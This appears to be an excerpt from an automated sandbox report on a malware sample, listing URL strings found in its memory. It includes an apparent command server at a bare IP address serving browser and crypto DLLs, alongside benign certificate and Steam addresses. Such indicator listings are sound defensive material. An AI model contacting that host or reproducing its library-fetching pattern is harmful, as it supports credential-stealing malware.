                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3402218568.000000002026D000.00000002.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://95.217.220.103
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175941738.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/%
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3277338251.000000000114C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215990470.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175887042.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262340532.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3277209575.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/?
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/G
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/a
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/en-GB
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dllO
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dlli
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/mozglue.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/msvcp140.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll2
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dllc
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dlln
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/r
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/v
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dllnV
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103AEB
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103CAA
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
